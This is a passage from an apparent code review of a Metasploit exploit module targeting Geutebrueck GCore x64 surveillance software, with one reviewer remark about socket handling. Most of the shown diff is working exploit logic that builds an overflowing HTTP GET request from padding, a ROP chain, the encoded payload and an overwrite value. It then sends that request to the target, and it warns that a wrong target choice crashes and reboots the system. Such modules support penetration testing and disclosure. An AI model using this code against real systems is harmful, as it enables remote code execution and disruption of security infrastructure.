modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

```diff
@@ -0,0 +1,286 @@
+
+        end
+      end
+
+    def exploit
+        if target['auto']
+            checkcode, target = fingerprint
+            if checkcode.to_s.include? 'unknown'
+                print_status('No vulnerable Version detected - exploit aborted.')
+            else
+                target_rop, target_overwrite, target_stack_align = ropchain(target)
+                begin
+                    connect
+                    print_status('Crafting Exploit...')
+
+                    http_req = 'GET /'
+                    buffer_200 = "\x41" * 200
+                    rop = target_rop
+                    payload.encoded
+                    buffer_1823 = "\x41" * 1823
+                    overwrite = target_overwrite
+                    stack_align = target_stack_align
+
+                    exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+                    print_status('Exploit ready for sending...')
+                    sock.put(exploit, 'Timeout' => 20)
+                    print_status('Exploit sent!')
+                    buf = sock.get_once || ''
+                rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+                    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+                ensure
+                    print_status('Closing socket.')
+                    disconnect
+                end
+            end
+
+        else
+            print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
+            print_status("Selected version: #{self.target.name}")
+            target_rop, target_overwrite, target_stack_align = ropchain(self.target)
+            begin
+                connect
+                print_status('Crafting Exploit...')
+
+                http_req = 'GET /'
+                buffer_200 = "\x41" * 200
+                rop = target_rop
+                payload.encoded
+                buffer_1823 = "\x41" * 1823
+                overwrite = target_overwrite
+                stack_align = target_stack_align
+
+                exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+                print_status('Exploit ready for sending...')
+                sock.put(exploit, 'Timeout' => 20)
+                print_status('Exploit sent!')
+                # sleep(10)
+                buf = sock.get_once || ''
+            rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+                elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+            ensure
+                print_status('Closing socket.')
+                disconnect
```

Comment:
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `disconnect` here.